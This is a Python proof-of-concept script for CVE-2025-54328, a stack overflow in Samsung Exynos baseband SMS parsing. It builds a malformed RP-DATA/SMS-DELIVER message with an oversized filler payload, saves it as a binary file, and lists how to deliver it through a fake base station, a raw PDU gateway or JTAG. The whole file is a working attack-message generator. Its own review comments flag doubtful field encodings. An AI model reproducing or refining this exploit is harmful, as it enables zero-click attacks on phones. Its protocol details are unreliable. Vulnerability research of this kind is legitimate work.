#!/usr/bin/env python3
"""
Conceptual PoC for CVE-2025-54328
Samsung Exynos SMS RP-DATA Stack-based Buffer Overflow
This script generates a malicious RP-DATA message with an oversized
TPDU payload designed to overflow a fixed-size stack buffer in the
Samsung Shannon baseband firmware's SMS parser.
Full article: https://www.hunt-benito.com/samsung-exynos-sms-stack-overflow-cve-2025-54328-critical-zero-click-baseband-rce/
FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH ONLY.
"""
import struct
import sys
def build_rp_data_overflow(target_number="1234567890", overflow_size=200):
    """
    Build a malicious RP-DATA (Network -> MS) message.
    RP-DATA format per 3GPP TS 24.011 Section 7.3.1:
    - Message Type: 1 octet (0x00 = network to MS)
    - Message Reference: 1 octet
    - RP-Originator Address: variable (Length + BCD address)
    - RP-Destination Address: variable (Length + BCD address)
    - RP-User Data: variable (Length + TPDU)

    Args:
        target_number (str): MSISDN placed in the RP-Destination Address. A
            leading '+' is stripped; every remaining character must be a
            decimal digit, otherwise int() raises ValueError.
        overflow_size (int): Number of 0x41 filler bytes appended as
            TP-User-Data, and the value written to TP-UDL. Must be 0..255
            (TP-UDL is one octet; bytearray.append raises ValueError
            otherwise). The fixed TPDU header is 15 octets and the RP-User
            Data length is also one octet, so overflow_size > 240 makes
            struct.pack raise struct.error.

    Returns:
        bytes: The complete RP-DATA message, with no lower-layer framing.

    NOTE(review): the address layout built here (empty RP-OA, populated
    RP-DA) matches the MS -> Network arrangement of TS 24.011 7.3.1; the
    Network -> MS variant carries the SC address in RP-OA and an empty
    RP-DA. Confirm which direction message type 0x00 is meant to model.
    """
    msg_type = 0x00  # RP-MTI: RP-DATA, network -> MS
    msg_ref = 0x01   # RP-MR: arbitrary message reference
    # RP-Originator Address as a bare length octet of 0: no address present.
    rp_originator = b'\x00'
    # Pack the MSISDN two digits per octet: first digit of each pair in the
    # high nibble, second in the low nibble; an odd trailing digit gets a
    # 0x0f filler in the low nibble.
    # NOTE(review): TS 23.040 semi-octet order is the reverse (first digit in
    # the low nibble, 0xF filler in the high nibble) — confirm intent.
    digits = target_number.lstrip('+')
    dest_addr_digits = bytes([(int(digits[i]) << 4) | (int(digits[i+1]) if i+1 < len(digits) else 0x0f)
                              for i in range(0, len(digits), 2)])
    # RP-DA length counts the TON/NPI octet plus the packed digits.
    dest_len = len(dest_addr_digits) + 1
    # 0x91: TON = international, NPI = ISDN/telephone numbering plan.
    rp_destination = struct.pack('B', dest_len) + b'\x91' + dest_addr_digits
    # SMS-DELIVER TPDU (TS 23.040 9.2.2.1), built field by field.
    tpdu = bytearray()
    tpdu.append(0x04)  # first octet: TP-MTI = 00 (SMS-DELIVER), TP-MMS bit set
    # TP-OA: address-length 0x02 (semi-octets), TON/NPI 0x91, digit octets 0x12 0xf1.
    # NOTE(review): a length of 2 semi-octets implies one digit octet, but two
    # follow; a conformant parser would take 0xf1 as TP-PID and read every
    # later field one octet off — confirm whether this is deliberate.
    tpdu.extend(b'\x02\x91\x12\xf1')
    tpdu.append(0x00)  # TP-PID
    tpdu.append(0x00)  # TP-DCS: GSM 7-bit default alphabet (TP-UDL is then a septet count, not octets)
    tpdu.extend(b'\x62\x40\x60\x21\x00\x00\x00')  # TP-SCTS: 7 octets, nibble-swapped BCD
    tpdu.append(overflow_size)  # TP-UDL: declared user-data length, one octet
    pattern = b'\x41' * overflow_size  # TP-UD: 'A' filler, overflow_size octets
    tpdu.extend(pattern)
    # RP-User Data: one-octet length followed by the TPDU.
    rp_user_data = struct.pack('B', len(tpdu)) + tpdu
    rp_data = bytes([msg_type, msg_ref]) + rp_originator + rp_destination + rp_user_data
    return rp_data
def main():
    """
    Command-line entry point.

    Reads an optional MSISDN from argv[1] (default "1234567890"), builds the
    RP-DATA message with a 200-byte TP-UD via build_rp_data_overflow, prints
    a summary and a hex dump of the first 64 bytes, writes the raw message to
    cve-2025-54328-poc-rpdata.bin in the current directory, and finally
    prints the script's explanatory notes.
    """
    banner = "=" * 60
    print(banner)
    print("CVE-2025-54328 - Conceptual PoC")
    print("Samsung Exynos SMS RP-DATA Stack Buffer Overflow")
    print(banner)
    print()

    target = sys.argv[1] if len(sys.argv) > 1 else "1234567890"
    overflow_size = 200
    rp_data = build_rp_data_overflow(target, overflow_size)

    print(f"[*] Target MSISDN: {target}")
    print(f"[*] Overflow payload size: {overflow_size} bytes")
    print(f"[*] Total RP-DATA message size: {len(rp_data)} bytes")
    print()

    # Offset-prefixed dump, 16 octets per row, capped at the first 64 octets.
    print("[*] RP-DATA hex dump (first 64 bytes):")
    shown = min(64, len(rp_data))
    for offset in range(0, shown, 16):
        row = rp_data[offset:offset + 16]
        print(f" {offset:04x}: {' '.join(format(b, '02x') for b in row)}")
    remaining = len(rp_data) - 64
    if remaining > 0:
        print(f" ... ({remaining} more bytes)")
    print()

    print("[*] Attack flow:")
    for step in (
        " 1. Baseband receives RP-DATA on NAS/SAPI=3 bearer",
        " 2. Shannon firmware parses RP-User Data field",
        f" 3. TP-UD ({overflow_size} bytes) copied into fixed-size stack buffer",
        " 4. Stack buffer overflows -> return address overwritten",
        " 5. Execution redirected to attacker-controlled code",
    ):
        print(step)
    print()

    # Persist the raw message so it can be inspected with other tooling.
    output_file = "cve-2025-54328-poc-rpdata.bin"
    with open(output_file, 'wb') as fh:
        fh.write(rp_data)
    print(f"[+] Raw RP-DATA message saved to: {output_file}")
    print()

    print("[!] To inject this message, you would need:")
    for line in (
        " - A fake BTS (OpenBTS/srsRAN) + SDR (USRP/HackRF)",
        " - Or an SMS gateway with raw PDU mode access",
        " - Or direct memory injection via JTAG/UART on the baseband",
    ):
        print(line)
# Run the CLI only when executed directly, not when imported as a module.
if __name__ == '__main__':
    main()